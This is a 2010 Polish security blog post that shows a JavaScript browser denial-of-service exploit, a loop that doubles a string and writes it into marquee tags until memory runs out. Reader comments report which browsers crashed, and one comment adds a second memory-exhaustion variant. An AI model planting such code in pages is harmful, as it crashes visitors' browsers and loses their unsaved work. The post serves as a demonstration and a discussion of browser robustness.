9:43
4/5/2010

Jeśli klikniesz na poniższy link, zawiesisz swoją przeglądarkę — niezależnie od tego, czy korzystasz z Firefoksa, IE, Opery, Safari czy Google Chrome.

Exploit na wszystkie przeglądarki

Poniższy exploit to klasyczny DoS — nie robi nic groźnego, a jedynie wyczerpie zasoby komputera, co na niektórych systemach może spowodować ubicie procesu przeglądarki. Niezapisane dane mogą zostać utracone! Przeglądarka przestanie odpowiadać, ale inne cześci systemu operacyjnego powinny działać bez zarzutu (różnie to jednak bywa, więc klikacie na własną odpowiedzialność).

<body onload="javascript:DoS();"></body>
<-- inj3ct0r.com -->
<script>
function DoS() {
var buffer = '\x42';
for (i =0;i<666;i++) {
buffer+=buffer+'\x42';
document.write('<html><marquee><h1>'+buffer+buffer); } }
</script>

P.S. Zawsze wiedziałem, że markizy powrócą z wielkim hukiem! ;-)

Przeczytaj także:


Dowiedz się, jak zabezpieczyć swoje dane i pieniądze przed cyberprzestępcami. Wpadnij na nasz kultowy ~3 godzinny wykład pt. "Jak nie dać się zhackować?" i poznaj kilkadziesiąt praktycznych i przede wszystkim prostych do zastosowania porad, które skutecznie podniosą Twoje bezpieczeństwo i pomogą ochronić przed atakami Twoich najbliższych. Uczestnicy tego wykładu oceniają go na: 9,34/10!

Na ten wykład powinien przyjść każdy, kto korzysta z internetu na smartfonie lub komputerze, prywatnie albo służbowo. Wykład prowadzimy prostym językiem, wiec zrozumie go każdy, także osoby spoza branży IT. Dlatego na wykład możesz spokojnie przyjść ze swoimi rodzicami lub mniej technicznymih znajomych. W najbliższych tygodniach będziemy w poniższych miastach:

Zobacz pełen opis wykładu klikając tutaj lub kup bilet na wykład klikając tu.

70 komentarzy

Dodaj komentarz
  1. Klasyk:)

  2. Fajny warunek for’a :D

  3. Links jak zwykle niepokonany ;)

  4. Lynx i Links są odporne :)

  5. Ciekawy warunek for () ;)

  6. Dodaję:

    Testowałem w Chrome, które już nie wstało. Firefox podobnie. Jednak IE 8 działało przez kilka sekund, po czym zawiesiło się na czas wyświetlania literek “BBBB…”. Potem znów wróciło do świata żywych przeglądarek i znów na chwilę zawiesiło. I tak w kółko.

  7. Mój Google Chrome niestety się nie wysypuje ;( Pojawia się tylko “Niedobrze! Wystąpił błąd podczas przetwarzania strony.”

  8. Jak to dobrze, że istnieją takie rzeczy jak noscript :)

  9. Wniosek z tego taki, iż NoScript jest dobry na wszystko

  10. Opera grzecznie stwierdzila, ze pojdzie spac :>

  11. Inne części systemu powinny działać bez zarzutu o ile ma się więcej niż jednordzeniowy procesor ;) .

    Wchodzę na stronę crash.html i WTF (Opera 10.53 6330 Linux)? No tak, JavaScript globalnie wyłączony :) .

  12. moj google chrome tez wyswietla tylko “niedobrze”…

  13. Hmm… Google Chrome przeżył bez większych problemów ;)
    Zakładka zjadła dobre 3GB pamięci, wyświetliła 2 razy komunikat że zakładka nie odpowiada (dałem że sobie poczekam;), w sumie nic nie wyświetliła ale przeglądarka nie padła ;)

  14. U mnie zawiesza się tylko Firefox i Opera, Chrome po paru sekundach uznaje że wystąpił błąd na stronie i przestaje obciążać komputer, a IE dzielnie próbuje wyświetlić stronę pokazując “BBBB” lub całą stronę krzaczków :) nie zawieszając się przy tym.

  15. iPhone’owa Opera tego nie otworzyla, chyba serwery Opery tego nie przepuscily.

  16. FF z noscriptem wyłączonym blokowaniem skryptów wywala się…

  17. Moje IE 8 przeżyło ;)

  18. @Bartosz
    Opera na iPhone nie obsługuje JS

  19. Pff.. Opera Mobile 10 na Windows Mobile przeżyła bez zająknięcia. A JS obsługuje całkiem nieźle.

  20. NoScript – NoProblem.

  21. A mnie nie przepuścił norton nawet do view-source tego drugiego exploita ;)
    http://static1.blip.pl/user_generated/update_pictures/1004499_inmsg.jpg

  22. Moje Chromium ma się dobrze, dziękuję za troskę. :>

  23. Teza bez potwierdzenia. Chrome 5.0.342.9 beta nie została zawieszona. Otwarta przeglądarka, w bieżącym oknie uruchomiony link. Oczekiwanie, w międzyczasie (kilka sekund po uruchomieniu linku) kliknięta “nowa karta”. Po kilkudziesięciu sekundach karta z feralna stroną komunikuje “Wystąpił błąd…”. Druga karta działa bez problemu. Czyli przeglądarka nie została zawieszona ;-)

  24. @t4ndeta
    Możesz zawsze zmienić warunek pętli z 666 na 1337, a jak i to nie wystarczy to 313373 :)

    BTW:Ile minimalnie trzeba mieć ramu, żeby przeglądarka się nie zawiesiła?

  25. FF – calkowita zawiecha i po chwili kill
    IE – krotka zwiecha i powrot do poprzedniego stanu + zamula przez zjedzony ram
    chrome – wywala sie tylko zakladka w ktorej zostala otwarta strona, przegladarka chodzi dalej

  26. @zzz1986@o2.pl
    Zależy od przeglądarki ;) . Np. u mnie zużycie pamięci po kilku minutach wzrosło o ok. 2 MB, ale za to jeden rdzeń procesora Opera zajęła całkowicie – Opera 10.53 6330 Linux.
    W Chromie z opisu kolegów wyżej wygląda to nieciekawie…

  27. Klient: instancja Windows XP

    Przegladarki:
    Opera: zwis
    Firefox: zwis
    IE6: nic sie nie dzieje

    @_@

  28. Chrome odporny :)

  29. Mi na googl’u nic się nie stało stało ;)
    Ver. 5.0.342.9 Beta

  30. Jeszcze trochę i wyjdzie na to, że ie6 jest najlepszą przeglądarką :D

  31. Lynx wytrzymał ;) Opera padła, Chrome po ok 2min pozbył się problemu sam. BTW. Jeszcze nigdhy nie udało mi się zapełnić całego swapu ‘o.O

  32. Links, Lynx nie obsługują javascriptu

  33. Chrome przeżył dzielnie, Opera zaś podziękowała za współpracę i zgłosiła się chętnie do kill’a.

  34. No nie wiem czy koledzy słyszeli że Chrome korzysta z sandoboxa, każdą zakładkę odpala jako osobne zadanie (nawet Flash działa na osobnym tasku – jak sie skilluje takiego [gdy np żre po całym rdzeniu] to na wszystkich zakładkach leci że plugin flasha zarobił glebe).. więc jakby sie coś w Chromiku zawiesiło wystarczy skillować jednego taska i bawić się dalej ;-)

  35. Aha zapomniałem dodać, cóż za problem stworzyć we flashu kodzik któe zeżre dużo pamięci i procesora.. ;-)

  36. @zzz1986@o2.pl “BTW:Ile minimalnie trzeba mieć ramu, żeby przeglądarka się nie zawiesiła?”
    Istnieje ograniczenie maksymalnej zajętości pamięci RAM przez pojedynczy program i wynosi ono 2gb (dla aplikacji 32-bitowych) – przynajmniej w windowsach, bo nie wiem jak z linuksami… także, nawet jak będziesz miał 5000gb ramu, to raczej i tak przywiesisz przegladarke ;)

  37. p.s: limit ten można zwiększyć maksymalnie do 3gb stosując przełącznik /set polecenia bcdedit :) Konkretnie to wyglada to tak:
    bcdedit /set increaseuserva 3072
    źródło: http://msdn.microsoft.com/en-us/library/ff542202.aspx

  38. @Kamil Karczmarczyk
    Dzięki za info.
    Nie miałem o tym nawet pojęcia.

  39. http://imgur.com/s1DWY.png
    U mnie nic się nie wysypało. FireFox pod XP-sp3. Oczywiście wtyczka blokująca tego typu numery załatwia sprawę.

  40. Firefox 3.6.4 odporny

  41. Kochany Noscript ;)

  42. Maxthon 2.5.11 się nie zawiesza. Wyświetla komunikat i tyle. Wszystko działa dalej dobrze. Drugi link w ogóle nie robi na nim żadnego wrażenia. Za to Maxthon z serii 3 wiesza się na obu…

  43. To jeszcze szybciej wyczerpie zasoby bo zżera pamięć w sposób eksponencjalny :)

    bb = document.getElementsByTagName(“body”);
    bb[0].innerHTML = ”;
    var a = “Oh s**t! \n”;
    for(j=0; j< 100; j++) {
    b = a+a; a += b; bb[0].innerHTML = bb[0].innerHTML+"”+a;
    }

    via http://www.polak.ro/how-to-make-ie-and-ff-to-run-out-of-memory-javascript.html

  44. IE8 mi nie padło, “Out of memory” i po chwili jechało “BBBB”, nic się nie stało dalej :D

  45. Można przed tym jakoś się zabezpieczyć systemowo czy jedynym wyjściem jest noscript ?
    Iceweasel(Firefox) powiesił mi się po 5-10 sekundach, razem z całym systemem.

    Z fork bombą poradziłem sobie wpisując:
    @users soft nproc 100
    do /etc/security/limits.conf .

    Natomiast jak sprawa wygląda z zabezpieczeniem się przed DoS?
    Jakieś małe wskazówki, co musiałbym zrobić aby na powyższych przykładowych exploitach od razu cały system się nie zawiesił ?

  46. Gadanie … przewijam i przewijam i nic, dziala wszystko nalezycie. Explorer 8

  47. Z ciekawości sprawdziłem na chrome 4.1.249.1064 (45376) i po sekundzie wyświetla komunikat “Aw, snap”. W międzyczasie zwiększa zużycie pamięci o kilkaset mega. Żadnych noscriptów czy innych czarów. Firefox 3.6.2 z drugiej strony (z wyłączonym NoScript) po kilku sekundach generuje Mozilla Crash Report. Vista x64 z ośmioma giga.

  48. Chrome – padla zakladka z linkiem exploita
    Norton Internet Security – info o probie wlamu, ale nie jest konieczne zadne dzialanie :)

  49. Nie kumam.
    Cieszycie się, że przeglądarki które nie obsługują JS nie padły albo że z wyłączoną obsługą JS nie zaliczyły zwiechy (pomijając Chrome).
    Ja nie kliknąłem w ogóle powyższych linków – też mam się cieszyć zajedwabistą przeglądarka ?

    Ogarnijcie się…

  50. Mac OS i Safari nietknięte ;)

  51. Nie powiedziałbym że chrom jest odporny, na pewno “umiera” proces tej karty w której otwarto strone. Alpha FF (z rozbiciem procesów) zachowuje się tak samo – proces “dead” przeglądarka działa.

  52. Konqueror zamiast procesora, zajął 3Gb pamięci ram.

  53. Nic nie zrobił.
    AVG go wygryzło i zablokowało jako exploit.

  54. Maxthon 2.5.12 się nie wysypał. Na pierwszym linku zjadło ok 400 mb ramu, na drugiej nic:)
    Chińczycy górą!

  55. Popieram Torwalda, świetnie, że macie antwirusy, skanery, dodatki NoScript i przeglądarki nie wspierające JS — ale to nie jest post, pod którym należy się tym przechwalać, bo wcale nie wychodzicie na “trendi i cool” a na osoby, które mają problemy z czytaniem ze zrozumieniem :>

  56. Czyli jeśli ktoś znajdzie jakąś dziurę w Windows 7 czy IE 8, to mam się nie cieszyć, że nie używam tego g*? Gdy będziecie pisać o słabościach systemów, to nie pisać jak ja się przed tym chronię? Ok.

    • Paweł: Spokojnie, powyższe słowa kierowane są do osób piszących: “U mnie na Lynx nie działa” :>

  57. Ależ ja jestem spokojny, nie denerwuję się. Jestem wręcz uśmiechnięty od ucha do ucha :) . To zapewne przez słowo na g tak to odebrałeś, więc postaram się więcej takich słów tutaj nie używać :) .
    Już wszystko jasne :) .

  58. Ach… myślałem że jakaś magia liczb, a tu zwykłe zapełnienie ramu ;p

  59. Nikt jeszcze nie próbował Konqueror-a więc melduję, że i on padł był

  60. NetSurf 1.8 na AmigaO 3.9 BoingBag 2 (z setkami rozmaitych patchy) dziala normalnie – do bani te exploity :)

  61. Ja posiadam COMODO Dragon i przeglądarka wyświetliła tylko informację o tym, że nie da się wyświetlić strony. Nic więcej.

    Pozdrawiam

  62. fajne narzędzie do sprawdzania wydajności swapa (i podgrzewania pokoju) :P

  63. U mnie IE8 po 3 sekundach zawiechy pokazał Out of memory:10 i odwiesił się .

  64. Google Chrome, żadnej zwiechy – nic.

  65. najnowszy FF. stronę mieli mieli i wyskakuje tylko timeout. zero zwiechy

  66. Not Found

    The requested URL /misc/exploits/crash.html was not found on this server.

    Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
    Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_fcgid/2.3.5 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at konieczny.be Port 80

    tyle pozostało po kliknięciu w linki :)

  67. LoL, Norton wykrywa to jako high danger Exploit! ShellCode :D

  68. Błąd 404

  69. Mój Internet Explorer 2 stwierdził, że nie obsługuje JS.

Twój komentarz

Zamieszczając komentarz akceptujesz regulamin dodawania komentarzy. Przez moderację nie przejdą: wycieczki osobiste, komentarze nie na temat, wulgaryzmy.

RSS dla komentarzy: